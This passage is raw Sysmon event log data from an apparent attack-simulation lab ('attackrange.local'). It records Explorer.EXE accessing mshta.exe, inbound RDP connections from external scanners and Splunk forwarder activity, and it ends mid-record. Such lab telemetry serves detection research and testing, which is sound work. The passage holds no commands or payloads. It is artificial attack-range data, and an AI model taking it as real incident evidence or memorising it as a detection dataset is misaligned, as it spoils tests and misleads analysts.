14:59:44.105{A7A01FEF-C0A6-607E-8105-00000000BB01}8364040C:\Windows\Explorer.EXE{A7A01FEF-EC5E-607E-6D0F-00000000BB01}4520C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082148Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:44.105{A7A01FEF-C0A6-607E-8105-00000000BB01}8364040C:\Windows\Explorer.EXE{A7A01FEF-EC5E-607E-6D0F-00000000BB01}4520C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082147Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:44.090{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EC5E-607E-6D0F-00000000BB01}4520C:\Windows\SYSTEM32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+628b0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082146Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:44.090{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EC5E-607E-6D0F-00000000BB01}4520C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bd0|C:\Windows\System32\SHELL32.dll+6286c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082145Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:44.090{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EC5E-607E-6D0F-00000000BB01}4520C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082144Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:44.090{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EC5E-607E-6D0F-00000000BB01}4520C:\Windows\SYSTEM32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000050831Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:42.818{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-55051-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050830Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:42.683{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-52105-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000082165Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:45.574{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CB0750B9F9D28833183B4E031ADEEB45,SHA256=85BE78400B38AE4AC228E0C8CCCDA95C8C50CF56332373E31AE5364286322E72,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082164Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:45.574{A7A01FEF-B626-607E-0D00-00000000BB01}10084160C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000082163Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:44.280{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57660-false10.0.1.12-8000- 354300x800000000000000082162Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:43.560{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-33097-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082161Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:43.485{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com60608-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082160Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:43.455{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-35815-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000082159Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:45.371{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0056CB26F7D4CF3AD8FFF1B39031C3D0,SHA256=F75437F0CDE488AF5A135D71DCE6AE176D6F532AA2529FBD0978EB41D708BE1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050836Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:45.918{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A03C0373804B7DCC672CA986572D00D,SHA256=25644AF6EA7C2D0AE5A9149FA62AFF51D8BADEB81D1C8D43DB7E377F329737E2,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050835Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:43.836{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52553-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000050834Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:43.079{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com61077-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050833Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:45.324{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4509EF411A4D947848BB84F505B2D42A,SHA256=F84FE87EC65EBB01185248EE2D0479A27A50380460D67417760320D999A926E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082166Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:46.387{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B9481AA36AAC5AE0A98E78BDBD40B69,SHA256=6422626A17026D5E87865FD4C4317D19815295A456B569C888B85D4A3C2624CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050840Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:46.932{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F64AF8D026A1FB2A52443421580FDDC,SHA256=F09B78FFDBED022CB8A0B5F4FF220B1418DCD272E5AC5B52FE5DC6E39C3D92FB,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050839Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:44.400{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-56530-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050838Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:44.259{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-53583-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050837Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:46.417{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1F0F5DF2AEE70AD5DDBB85D7FC8B0F5A,SHA256=F82FBE28E13F5750BF4BC78D4C455695EEE6C73AC72686AFA233029B76048C6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082168Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:47.402{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=916315436375C5E84A78E4B82CBF3B79,SHA256=280047F9675D52AC35FF5961639F08A9DB6CE3DEF34F2416F97662CFBD8E12C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082167Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:47.074{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9FCBE0E592CFBD1DF42990D401B82EF7,SHA256=664CB531F6DDD5E1EF25069D117E31738905CCC62D7AFA00EDA5C61696FA1F58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050843Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:47.948{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9060CF87E90ED8656C90D0A5AFB64B54,SHA256=F90FC6B7F661DB93659FF33EA2B32C63917E5BCC775CDF01E3D6C8CF59F91C74,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050842Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:46.015{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-58014-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050841Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:47.432{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B0B75402E40381CD8E51AF4381C74C7D,SHA256=CB011A2A5235BE9297F3C400E8150046735446DA28A2F5AFF71C838129CE7AA5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082170Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:48.746{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=11551469DC5D53308F86F0731A8E1C06,SHA256=EA12CEE30602151B61623A0ED13BDBB0C38846D3C613A1307800B7EBC3310CFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082169Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:48.418{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA799104295AA7BAD3E5E19D716C3981,SHA256=1EF3BF28EA5F6AFCDE767403DEDE08DB9550B3C886C889FEBF84D2BCC58680AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050845Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:48.963{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6AAA79F74FBE4EC4DAB3429497A0C39A,SHA256=75A28DE419E432E5986FB4AE4BE3E9CFF0D5225FC261B2844C81333EFA4FD441,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050844Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:48.948{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1E9B34A250CA287F11347A00D7F65959,SHA256=9AD0D4FD750EF70A029EDA00F4FE88193E3627715D965D2C23A032C03C6A1A27,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082172Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:47.708{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com63665-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000082171Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:49.465{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8754A352B1D211974737E401183FE329,SHA256=13E62344EF649B28BD73B0559AA809420B989A1F15D01BCB87E39D2E9DA0128F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050846Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:49.979{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=813FF1AEE566955EA97BF59EBA570D93,SHA256=803B503A9BD8429953A5720713B2A8816BD302F7A22580CFF081A66D8C7276E0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082175Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:49.365{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-41251-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000082174Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:50.496{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09FF3377767B3A77B564B98282A79A43,SHA256=D6351E1AD7953F1DBB352E4CCA50C5A02F9D5251D6BD05684CBF12A664F4A821,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082173Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:50.090{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9B0A8126CEF0A344EF2163CDF404E049,SHA256=C70E94D8C0D0E4B26A6A188A734ED4E671F67C37589BBA85FE8CD1B20C2EF6B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050847Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:50.979{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=193E9E8A68138D9D6A63B5BD6A9867F3,SHA256=DBEB7815019D71F4E77C55D0807FEC8ADA41052796FA64A9194BF6CDAFF4A6CA,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082179Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:50.311{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57661-false10.0.1.12-8000- 354300x800000000000000082178Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:49.603{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-38533-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000082177Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:51.527{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90D14543BBC46B103B88BFE8C88E7BA0,SHA256=2C8312D89D6CFE0CCB84CBDA3C561B8418D2ABA7DE85D0E3BDDD15DED2240ED3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082176Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:51.261{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=45097AD74B8D6EF322989DC56EF3BC05,SHA256=60213A2B190BA4FDB6D7F3EC4A4E62C6AFB0148E98592768C75856BBF252BFFC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050850Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:51.979{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A6792F3CA3CC0912BD9C4D6AD6C5003,SHA256=D279835AD8B666C76B6FD0F080DC84E311BE6C73BAF9DA87B7628BC2E43F8E7A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050849Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:49.663{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52554-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000050848Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:49.218{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-60959-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000082182Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:50.984{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-39892-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082181Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:50.914{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com52993-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000082180Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:52.543{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6787C6C7AAB638B4B6269AAB03718E5F,SHA256=64315490670BB2FE01E1D85D675F3EBF2B7F94E1034B592840719FBDCCD53E93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050852Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:52.995{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D585D9E19C9C339CDDDC40CE576FB3A0,SHA256=1EE9FA53A0ABE108F3B26148A6ADA2A6658E8213AD04740C7050C4DF9FCD8DDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050851Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:52.167{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6ADB158C7F2CBD3E93B0DE2048429833,SHA256=8DC065564D7C722EAAEA57A34881B514A3AE37A8D912BA24ADC27B370519B7BE,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082185Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:52.368{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-43969-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000082184Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:53.590{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF27FB03F108A3CB8FEBE4DFCDDB125A,SHA256=027D8BDE9D3772BF0678F3E6EC61396F8C72F8A7A02E812C2AB1BCC320CBA29B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082183Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:53.121{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C16393A9EE1BD2ECAD0977426F652CA0,SHA256=77BA96EE1EF6FE7F85FA8326C1399E9C089E156EBB0930F3FE2FB89AC9660BC4,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050856Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:51.490{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com54177-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050855Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 